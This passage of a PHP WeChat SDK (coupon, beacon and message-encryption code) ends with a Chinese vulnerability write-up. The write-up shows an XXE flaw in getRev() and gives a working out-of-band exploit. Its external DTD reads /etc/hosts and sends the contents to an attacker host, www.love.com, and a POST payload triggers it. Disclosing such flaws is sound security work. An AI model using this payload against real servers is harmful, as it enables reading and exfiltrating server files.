注:为避免用户疑惑,建议仅在发生转赠行为后(发生转赠后,微信会通过事件推送的方式告知商户被转赠的卡券code)对用户的code进行更改。 * @param string $code 卡券的 code 编码 * @param string $card_id 卡券 ID * @param string $new_code 新的卡券 code 编码 * @return boolean */ public function updateCardCode($code,$card_id,$new_code) { $data = array( \'code\' => $code, \'card_id\' => $card_id, \'new_code\' => $new_code, ); if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_CODE_UPDATE . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 设置卡券失效 * 设置卡券失效的操作不可逆 * @param string $code 需要设置为失效的 code * @param string $card_id 自定义 code 的卡券必填。非自定义 code 的卡券不填。 * @return boolean */ public function unavailableCardCode($code,$card_id=\'\') { $data = array( \'code\' => $code, ); if ($card_id) $data[\'card_id\'] = $card_id; if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_CODE_UNAVAILABLE . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 库存修改 * @param string $data * @return boolean */ public function modifyCardStock($data) { if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_MODIFY_STOCK . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 更新门票 * @param string $data * @return boolean */ public function updateMeetingCard($data) { if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_MEETINGCARD_UPDATEUSER . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 激活/绑定会员卡 * @param string $data 具体结构请参看卡券开发文档(6.1.1 激活/绑定会员卡)章节 * @return boolean */ public function activateMemberCard($data) { if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_MEMBERCARD_ACTIVATE . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 会员卡交易 * 会员卡交易后每次积分及余额变更需通过接口通知微信,便于后续消息通知及其他扩展功能。 * @param string $data 具体结构请参看卡券开发文档(6.1.2 会员卡交易)章节 * @return boolean|array */ public function updateMemberCard($data) { if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_MEMBERCARD_UPDATEUSER . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 更新红包金额 * @param string $code 红包的序列号 * @param $balance 红包余额 * @param string $card_id 自定义 code 的卡券必填。非自定义 code 可不填。 * @return boolean|array */ public function updateLuckyMoney($code,$balance,$card_id=\'\') { $data = array( \'code\' => $code, \'balance\' => $balance ); if ($card_id) $data[\'card_id\'] = $card_id; if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_LUCKYMONEY_UPDATE . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 设置卡券测试白名单 * @param string $openid 测试的 openid 列表 * @param string $user 测试的微信号列表 * @return boolean */ public function setCardTestWhiteList($openid=array(),$user=array()) { $data = array(); if (count($openid) > 0) $data[\'openid\'] = $openid; if (count($user) > 0) $data[\'username\'] = $user; if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::CARD_TESTWHILELIST_SET . \'access_token=\' . $this->access_token, self::json_encode($data)); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 申请设备ID * [applyShakeAroundDevice 申请配置设备所需的UUID、Major、Minor。 * 若激活率小于50%,不能新增设备。单次新增设备超过500 个,需走人工审核流程。 * 审核通过后,可用迒回的批次ID 用“查询设备列表”接口拉取本次申请的设备ID] * @param array $data * array( * "quantity" => 3, //申请的设备ID 的数量,单次新增设备超过500 个,需走人工审核流程(必填) * "apply_reason" => "测试",//申请理由(必填) * "comment" => "测试专用", //备注(非必填) * "poi_id" => 1234 //设备关联的门店ID(非必填) * ) * @return boolean|mixed * { "data": { "apply_id": 123, "device_identifiers":[ { "device_id":10100, "uuid":"FDA50693-A4E2-4FB1-AFCF-C6EB07647825", "major":10001, "minor":10002 } ] }, "errcode": 0, "errmsg": "success." } apply_id:申请的批次ID,可用在“查询设备列表”接口按批次查询本次申请成功的设备ID device_identifiers:指定的设备ID 列表 device_id:设备编号 uuid、major、minor audit_status:审核状态。0:审核未通过、1:审核中、2:审核已通过;审核会在三个工作日内完成 audit_comment:审核备注,包括审核不通过的原因 * @access public * @author polo<gao.bo168@gmail.com> * @version 2015-3-25 下午1:24:06 * @copyright Show More */ public function applyShakeAroundDevice($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_DEVICE_APPLYID . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 编辑设备信息 * [updateShakeAroundDevice 编辑设备的备注信息。可用设备ID或完整的UUID、Major、Minor指定设备,二者选其一。] * @param array $data * array( * "device_identifier" => array( * "device_id" => 10011, //当提供了device_id则不需要使用uuid、major、minor,反之亦然 * "uuid" => "FDA50693-A4E2-4FB1-AFCF-C6EB07647825", * "major" => 1002, * "minor" => 1223 * ), * "comment" => "测试专用", //备注(非必填) * ) * { "data": { }, "errcode": 0, "errmsg": "success." } * @return boolean * @author binsee<binsee@163.com> * @version 2015-4-20 23:45:00 */ public function updateShakeAroundDevice($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_DEVICE_UPDATE . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 查询设备列表 * [searchShakeAroundDevice 查询已有的设备ID、UUID、Major、Minor、激活状态、备注信息、关联门店、关联页面等信息。 * 可指定设备ID 或完整的UUID、Major、Minor 查询,也可批量拉取设备信息列表。] * @param array $data * $data 三种格式: * ①查询指定设备时:$data = array( * "device_identifiers" => array( * array( * "device_id" => 10100, * "uuid" => "FDA50693-A4E2-4FB1-AFCF-C6EB07647825", * "major" => 10001, * "minor" => 10002 * ) * ) * ); * device_identifiers:指定的设备 * device_id:设备编号,若填了UUID、major、minor,则可不填设备编号,若二者都填,则以设备编号为优先 * uuid、major、minor:三个信息需填写完整,若填了设备编号,则可不填此信息 * +------------------------------------------------------------------------------------------------------------- * ②需要分页查询或者指定范围内的设备时: $data = array( * "begin" => 0, * "count" => 3 * ); * begin:设备列表的起始索引值 * count:待查询的设备个数 * +------------------------------------------------------------------------------------------------------------- * ③当需要根据批次ID 查询时: $data = array( * "apply_id" => 1231, * "begin" => 0, * "count" => 3 * ); * apply_id:批次ID * +------------------------------------------------------------------------------------------------------------- * @return boolean|mixed *正确迒回JSON 数据示例: *字段说明 { "data": { "devices": [ //指定的设备信息列表 { "comment": "", //设备的备注信息 "device_id": 10097, //设备编号 "major": 10001, "minor": 12102, "page_ids": "15369", //与此设备关联的页面ID 列表,用逗号隔开 "status": 1, //激活状态,0:未激活,1:已激活(但不活跃),2:活跃 "poi_id": 0, //门店ID "uuid": "FDA50693-A4E2-4FB1-AFCF-C6EB07647825" }, { "comment": "", //设备的备注信息 "device_id": 10098, //设备编号 "major": 10001, "minor": 12103, "page_ids": "15368", //与此设备关联的页面ID 列表,用逗号隔开 "status": 1, //激活状态,0:未激活,1:已激活(但不活跃),2:活跃 "poi_id": 0, //门店ID "uuid": "FDA50693-A4E2-4FB1-AFCF-C6EB07647825" } ], "total_count": 151 //商户名下的设备总量 }, "errcode": 0, "errmsg": "success." } * @access public * @author polo<gao.bo168@gmail.com> * @version 2015-3-25 下午1:45:42 * @copyright Show More */ public function searchShakeAroundDevice($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_DEVICE_SEARCH . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * [bindLocationShakeAroundDevice 配置设备与门店的关联关系] * @param string $device_id 设备编号,若填了UUID、major、minor,则可不填设备编号,若二者都填,则以设备编号为优先 * @param int $poi_id 待关联的门店ID * @param string $uuid UUID、major、minor,三个信息需填写完整,若填了设备编号,则可不填此信息 * @param int $major * @param int $minor * @return boolean|mixed * 正确返回JSON 数据示例: * { "data": { }, "errcode": 0, "errmsg": "success." } * @access public * @author polo<gao.bo168@gmail.com> * @version 2015-4-21 00:14:00 * @copyright Show More */ public function bindLocationShakeAroundDevice($device_id,$poi_id,$uuid=\'\',$major=0,$minor=0){ if (!$this->access_token && !$this->checkAuth()) return false; if(!$device_id){ if(!$uuid || !$major || !$minor){ return false; } $device_identifier = array( \'uuid\' => $uuid, \'major\' => $major, \'minor\' => $minor ); }else{ $device_identifier = array( \'device_id\' => $device_id ); } $data = array( \'device_identifier\' => $device_identifier, \'poi_id\' => $poi_id ); $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_DEVICE_BINDLOCATION . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; //这个可以更改为返回true } return false; } /** * [bindPageShakeAroundDevice 配置设备与页面的关联关系。 * 支持建立或解除关联关系,也支持新增页面或覆盖页面等操作。 * 配置完成后,在此设备的信号范围内,即可摇出关联的页面信息。 * 若设备配置多个页面,则随机出现页面信息] * @param string $device_id 设备编号,若填了UUID、major、minor,则可不填设备编号,若二者都填,则以设备编号为优先 * @param array $page_ids 待关联的页面列表 * @param number $bind 关联操作标志位, 0 为解除关联关系,1 为建立关联关系 * @param number $append 新增操作标志位, 0 为覆盖,1 为新增 * @param string $uuid UUID、major、minor,三个信息需填写完整,若填了设备编号,则可不填此信息 * @param int $major * @param int $minor * @return boolean|mixed * 正确返回JSON 数据示例: * { "data": { }, "errcode": 0, "errmsg": "success." } * @access public * @author polo<gao.bo168@gmail.com> * @version 2015-4-21 00:31:00 * @copyright Show More */ public function bindPageShakeAroundDevice($device_id,$page_ids=array(),$bind=1,$append=1,$uuid=\'\',$major=0,$minor=0){ if (!$this->access_token && !$this->checkAuth()) return false; if(!$device_id){ if(!$uuid || !$major || !$minor){ return false; } $device_identifier = array( \'uuid\' => $uuid, \'major\' => $major, \'minor\' => $minor ); }else{ $device_identifier = array( \'device_id\' => $device_id ); } $data = array( \'device_identifier\' => $device_identifier, \'page_ids\' => $page_ids, \'bind\' => $bind, \'append\' => $append ); $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_DEVICE_BINDPAGE . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 上传在摇一摇页面展示的图片素材 * 注意:数组的键值任意,但文件名前必须加@,使用单引号以避免本地路径斜杠被转义 * @param array $data {"media":\'@Path\filename.jpg\'} 格式限定为:jpg,jpeg,png,gif,图片大小建议120px*120 px,限制不超过200 px *200 px,图片需为正方形。 * @return boolean|array * { "data": { "pic_url":"http://shp.qpic.cn/wechat_shakearound_pic/0/1428377032e9dd2797018cad79186e03e8c5aec8dc/120" }, "errcode": 0, "errmsg": "success." } } * @author binsee<binsee@163.com> * @version 2015-4-21 00:51:00 */ public function uploadShakeAroundMedia($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::SHAKEAROUND_MATERIAL_ADD.\'access_token=\'.$this->access_token,$data,true); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * [addShakeAroundPage 增加摇一摇出来的页面信息,包括在摇一摇页面出现的主标题、副标题、图片和点击进去的超链接。] * @param string $title 在摇一摇页面展示的主标题,不超过6 个字 * @param string $description 在摇一摇页面展示的副标题,不超过7 个字 * @param sting $icon_url 在摇一摇页面展示的图片, 格式限定为:jpg,jpeg,png,gif; 建议120*120 , 限制不超过200*200 * @param string $page_url 跳转链接 * @param string $comment 页面的备注信息,不超过15 个字,可不填 * @return boolean|mixed * 正确返回JSON 数据示例: * { "data": { "page_id": 28840 //新增页面的页面id } "errcode": 0, "errmsg": "success." } * @access public * @author polo<gao.bo168@gmail.com> * @version 2015-3-25 下午2:57:09 * @copyright Show More */ public function addShakeAroundPage($title,$description,$icon_url,$page_url,$comment=\'\'){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( "title" => $title, "description" => $description, "icon_url" => $icon_url, "page_url" => $page_url, "comment" => $comment ); $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_PAGE_ADD . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * [updateShakeAroundPage 编辑摇一摇出来的页面信息,包括在摇一摇页面出现的主标题、副标题、图片和点击进去的超链接。] * @param int $page_id * @param string $title 在摇一摇页面展示的主标题,不超过6 个字 * @param string $description 在摇一摇页面展示的副标题,不超过7 个字 * @param sting $icon_url 在摇一摇页面展示的图片, 格式限定为:jpg,jpeg,png,gif; 建议120*120 , 限制不超过200*200 * @param string $page_url 跳转链接 * @param string $comment 页面的备注信息,不超过15 个字,可不填 * @return boolean|mixed * 正确返回JSON 数据示例: * { "data": { "page_id": 28840 //编辑页面的页面ID } "errcode": 0, "errmsg": "success." } * @access public * @author polo<gao.bo168@gmail.com> * @version 2015-3-25 下午3:02:51 * @copyright Show More */ public function updateShakeAroundPage($page_id,$title,$description,$icon_url,$page_url,$comment=\'\'){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( "page_id" => $page_id, "title" => $title, "description" => $description, "icon_url" => $icon_url, "page_url" => $page_url, "comment" => $comment ); $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_PAGE_UPDATE . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * [searchShakeAroundPage 查询已有的页面,包括在摇一摇页面出现的主标题、副标题、图片和点击进去的超链接。 * 提供两种查询方式,①可指定页面ID 查询,②也可批量拉取页面列表。] * @param array $page_ids * @param int $begin * @param int $count * ①需要查询指定页面时: * { "page_ids":[12345, 23456, 34567] } * +------------------------------------------------------------------------------------------------------------- * ②需要分页查询或者指定范围内的页面时: * { "begin": 0, "count": 3 } * +------------------------------------------------------------------------------------------------------------- * @return boolean|mixed * 正确返回JSON 数据示例: { "data": { "pages": [ { "comment": "just for test", "description": "test", "icon_url": "https://www.baidu.com/img/bd_logo1.png", "page_id": 28840, "page_url": "http://xw.qq.com/testapi1", "title": "测试1" }, { "comment": "just for test", "description": "test", "icon_url": "https://www.baidu.com/img/bd_logo1.png", "page_id": 28842, "page_url": "http://xw.qq.com/testapi2", "title": "测试2" } ], "total_count": 2 }, "errcode": 0, "errmsg": "success." } *字段说明: *total_count 商户名下的页面总数 *page_id 摇周边页面唯一ID *title 在摇一摇页面展示的主标题 *description 在摇一摇页面展示的副标题 *icon_url 在摇一摇页面展示的图片 *page_url 跳转链接 *comment 页面的备注信息 * @access public * @author polo<gao.bo168@gmail.com> * @version 2015-3-25 下午3:12:17 * @copyright Show More */ public function searchShakeAroundPage($page_ids=array(),$begin=0,$count=1){ if (!$this->access_token && !$this->checkAuth()) return false; if(!empty($page_ids)){ $data = array( \'page_ids\' => $page_ids ); }else{ $data = array( \'begin\' => $begin, \'count\' => $count ); } $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_PAGE_SEARCH . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * [deleteShakeAroundPage 删除已有的页面,包括在摇一摇页面出现的主标题、副标题、图片和点击进去的超链接。 * 只有页面与设备没有关联关系时,才可被删除。] * @param array $page_ids * { "page_ids":[12345,23456,34567] } * @return boolean|mixed * 正确返回JSON 数据示例: * { "data": { }, "errcode": 0, "errmsg": "success." } * @access public * @author polo<gao.bo168@gmail.com> * @version 2015-3-25 下午3:23:00 * @copyright Show More */ public function deleteShakeAroundPage($page_ids=array()){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( \'page_ids\' => $page_ids ); $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_PAGE_DELETE . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * [getShakeInfoShakeAroundUser 获取设备信息,包括UUID、major、minor,以及距离、openID 等信息。] * @param string $ticket 摇周边业务的ticket,可在摇到的URL 中得到,ticket生效时间为30 分钟 * @return boolean|mixed * 正确返回JSON 数据示例: * { "data": { "page_id ": 14211, "beacon_info": { "distance": 55.00620700469034, "major": 10001, "minor": 19007, "uuid": "FDA50693-A4E2-4FB1-AFCF-C6EB07647825" }, "openid": "oVDmXjp7y8aG2AlBuRpMZTb1-cmA" }, "errcode": 0, "errmsg": "success." } * 字段说明: * beacon_info 设备信息,包括UUID、major、minor,以及距离 * UUID、major、minor UUID、major、minor * distance Beacon 信号与手机的距离 * page_id 摇周边页面唯一ID * openid 商户AppID 下用户的唯一标识 * poi_id 门店ID,有的话则返回,没有的话不会在JSON 格式内 * @access public * @author polo<gao.bo168@gmail.com> * @version 2015-3-25 下午3:28:20 * @copyright Show More */ public function getShakeInfoShakeAroundUser($ticket){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array(\'ticket\' => $ticket); $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_USER_GETSHAKEINFO . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * [deviceShakeAroundStatistics 以设备为维度的数据统计接口。 * 查询单个设备进行摇周边操作的人数、次数,点击摇周边消息的人数、次数;查询的最长时间跨度为30天。] * @param int $device_id 设备编号,若填了UUID、major、minor,即可不填设备编号,二者选其一 * @param int $begin_date 起始日期时间戳,最长时间跨度为30 天 * @param int $end_date 结束日期时间戳,最长时间跨度为30 天 * @param string $uuid UUID、major、minor,三个信息需填写完成,若填了设备编辑,即可不填此信息,二者选其一 * @param int $major * @param int $minor * @return boolean|mixed * 正确返回JSON 数据示例: * { "data": [ { "click_pv": 0, "click_uv": 0, "ftime": 1425052800, "shake_pv": 0, "shake_uv": 0 }, { "click_pv": 0, "click_uv": 0, "ftime": 1425139200, "shake_pv": 0, "shake_uv": 0 } ], "errcode": 0, "errmsg": "success." } * 字段说明: * ftime 当天0 点对应的时间戳 * click_pv 点击摇周边消息的次数 * click_uv 点击摇周边消息的人数 * shake_pv 摇周边的次数 * shake_uv 摇周边的人数 * @access public * @author polo<gao.bo168@gmail.com> * @version 2015-4-21 00:39:00 * @copyright Show More */ public function deviceShakeAroundStatistics($device_id,$begin_date,$end_date,$uuid=\'\',$major=0,$minor=0){ if (!$this->access_token && !$this->checkAuth()) return false; if(!$device_id){ if(!$uuid || !$major || !$minor){ return false; } $device_identifier = array( \'uuid\' => $uuid, \'major\' => $major, \'minor\' => $minor ); }else{ $device_identifier = array( \'device_id\' => $device_id ); } $data = array( \'device_identifier\' => $device_identifier, \'begin_date\' => $begin_date, \'end_date\' => $end_date ); $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_STATISTICS_DEVICE . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * [pageShakeAroundStatistics 以页面为维度的数据统计接口。 * 查询单个页面通过摇周边摇出来的人数、次数,点击摇周边页面的人数、次数;查询的最长时间跨度为30天。] * @param int $page_id 指定页面的ID * @param int $begin_date 起始日期时间戳,最长时间跨度为30 天 * @param int $end_date 结束日期时间戳,最长时间跨度为30 天 * @return boolean|mixed * 正确返回JSON 数据示例: * { "data": [ { "click_pv": 0, "click_uv": 0, "ftime": 1425052800, "shake_pv": 0, "shake_uv": 0 }, { "click_pv": 0, "click_uv": 0, "ftime": 1425139200, "shake_pv": 0, "shake_uv": 0 } ], "errcode": 0, "errmsg": "success." } * 字段说明: * ftime 当天0 点对应的时间戳 * click_pv 点击摇周边消息的次数 * click_uv 点击摇周边消息的人数 * shake_pv 摇周边的次数 * shake_uv 摇周边的人数 * @author binsee<binsee@163.com> * @version 2015-4-21 00:43:00 */ public function pageShakeAroundStatistics($page_id,$begin_date,$end_date){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( \'page_id\' => $page_id, \'begin_date\' => $begin_date, \'end_date\' => $end_date ); $result = $this->http_post(self::API_BASE_URL_PREFIX . self::SHAKEAROUND_STATISTICS_DEVICE . \'access_token=\' . $this->access_token, self::json_encode($data)); $this->log($result); if ($result) { $json = json_decode($result, true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } } /** * PKCS7Encoder class * * 提供基于PKCS7算法的加解密接口. */ class PKCS7Encoder { public static $block_size = 32; /** * 对需要加密的明文进行填充补位 * @param $text 需要进行填充补位操作的明文 * @return 补齐明文字符串 */ function encode($text) { $block_size = PKCS7Encoder::$block_size; $text_length = strlen($text); //计算需要填充的位数 $amount_to_pad = PKCS7Encoder::$block_size - ($text_length % PKCS7Encoder::$block_size); if ($amount_to_pad == 0) { $amount_to_pad = PKCS7Encoder::block_size; } //获得补位所用的字符 $pad_chr = chr($amount_to_pad); $tmp = ""; for ($index = 0; $index < $amount_to_pad; $index++) { $tmp .= $pad_chr; } return $text . $tmp; } /** * 对解密后的明文进行补位删除 * @param decrypted 解密后的明文 * @return 删除填充补位后的明文 */ function decode($text) { $pad = ord(substr($text, -1)); if ($pad < 1 || $pad > PKCS7Encoder::$block_size) { $pad = 0; } return substr($text, 0, (strlen($text) - $pad)); } } /** * Prpcrypt class * * 提供接收和推送给公众平台消息的加解密接口. */ class Prpcrypt { public $key; function __construct($k) { $this->key = base64_decode($k . "="); } /** * 兼容老版本php构造函数,不能在 __construct() 方法前边,否则报错 */ function Prpcrypt($k) { $this->key = base64_decode($k . "="); } /** * 对明文进行加密 * @param string $text 需要加密的明文 * @return string 加密后的密文 */ public function encrypt($text, $appid) { try { //获得16位随机字符串,填充到明文之前 $random = $this->getRandomStr();//"aaaabbbbccccdddd"; $text = $random . pack("N", strlen($text)) . $text . $appid; // 网络字节序 $size = mcrypt_get_block_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC); $module = mcrypt_module_open(MCRYPT_RIJNDAEL_128, \'\', MCRYPT_MODE_CBC, \'\'); $iv = substr($this->key, 0, 16); //使用自定义的填充方式对明文进行补位填充 $pkc_encoder = new PKCS7Encoder; $text = $pkc_encoder->encode($text); mcrypt_generic_init($module, $this->key, $iv); //加密 $encrypted = mcrypt_generic($module, $text); mcrypt_generic_deinit($module); mcrypt_module_close($module); // print(base64_encode($encrypted)); //使用BASE64对加密后的字符串进行编码 return array(ErrorCode::$OK, base64_encode($encrypted)); } catch (Exception $e) { //print $e; return array(ErrorCode::$EncryptAESError, null); } } /** * 对密文进行解密 * @param string $encrypted 需要解密的密文 * @return string 解密得到的明文 */ public function decrypt($encrypted, $appid) { try { //使用BASE64对需要解密的字符串进行解码 $ciphertext_dec = base64_decode($encrypted); $module = mcrypt_module_open(MCRYPT_RIJNDAEL_128, \'\', MCRYPT_MODE_CBC, \'\'); $iv = substr($this->key, 0, 16); mcrypt_generic_init($module, $this->key, $iv); //解密 $decrypted = mdecrypt_generic($module, $ciphertext_dec); mcrypt_generic_deinit($module); mcrypt_module_close($module); } catch (Exception $e) { return array(ErrorCode::$DecryptAESError, null); } try { //去除补位字符 $pkc_encoder = new PKCS7Encoder; $result = $pkc_encoder->decode($decrypted); //去除16位随机字符串,网络字节序和AppId if (strlen($result) < 16) return ""; $content = substr($result, 16, strlen($result)); $len_list = unpack("N", substr($content, 0, 4)); $xml_len = $len_list[1]; $xml_content = substr($content, 4, $xml_len); $from_appid = substr($content, $xml_len + 4); if (!$appid) $appid = $from_appid; //如果传入的appid是空的,则认为是订阅号,使用数据中提取出来的appid } catch (Exception $e) { //print $e; return array(ErrorCode::$IllegalBuffer, null); } if ($from_appid != $appid) return array(ErrorCode::$ValidateAppidError, null); //不注释上边两行,避免传入appid是错误的情况 return array(0, $xml_content, $from_appid); //增加appid,为了解决后面加密回复消息的时候没有appid的订阅号会无法回复 } /** * 随机生成16位字符串 * @return string 生成的字符串 */ function getRandomStr() { $str = ""; $str_pol = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"; $max = strlen($str_pol) - 1; for ($i = 0; $i < 16; $i++) { $str .= $str_pol[mt_rand(0, $max)]; } return $str; } } /** * error code * 仅用作类内部使用,不用于官方API接口的errCode码 */ class ErrorCode { public static $OK = 0; public static $ValidateSignatureError = 40001; public static $ParseXmlError = 40002; public static $ComputeSignatureError = 40003; public static $IllegalAesKey = 40004; public static $ValidateAppidError = 40005; public static $EncryptAESError = 40006; public static $DecryptAESError = 40007; public static $IllegalBuffer = 40008; public static $EncodeBase64Error = 40009; public static $DecodeBase64Error = 40010; public static $GenReturnXmlError = 40011; public static $errCode=array( \'0\' => \'处理成功\', \'40001\' => \'校验签名失败\', \'40002\' => \'解析xml失败\', \'40003\' => \'计算签名失败\', \'40004\' => \'不合法的AESKey\', \'40005\' => \'校验AppID失败\', \'40006\' => \'AES加密失败\', \'40007\' => \'AES解密失败\', \'40008\' => \'公众平台发送的xml不合法\', \'40009\' => \'Base64编码失败\', \'40010\' => \'Base64解码失败\', \'40011\' => \'公众帐号生成回包xml失败\' ); public static function getErrText($err) { if (isset(self::$errCode[$err])) { return self::$errCode[$err]; }else { return false; }; } }
举个例子一(以前更老的代码也有这段):
/**
* 获取微信服务器发来的信息
*/
public function getRev()
{
if ($this->_receive) return $this;
$postStr = file_get_contents("php://input");
$this->log($postStr);
if (!empty($postStr)) {
$this->_receive = (array)simplexml_load_string($postStr, \'SimpleXMLElement\', LIBXML_NOCDATA);
}
return $this;
}
把post的数据直接进入了simplexml_load_string()
当调用了此文件里面的有漏洞的方法的时候就直接测试就OK
测试方法:
远程主机(www.love.com/evil.xml)Evil.xml:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=file:///etc/hosts"> <!ENTITY % int "<!ENTITY % send SYSTEM \'http://www.love.com/?file=%file;\'>"> %int; %send;
POST请求:
POST: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE entity [ <!ENTITY % call SYSTEM "http://www.love.com/evil.xml"> %call; ]>
参考:
http://security.tencent.com/index.php/blog/msg/69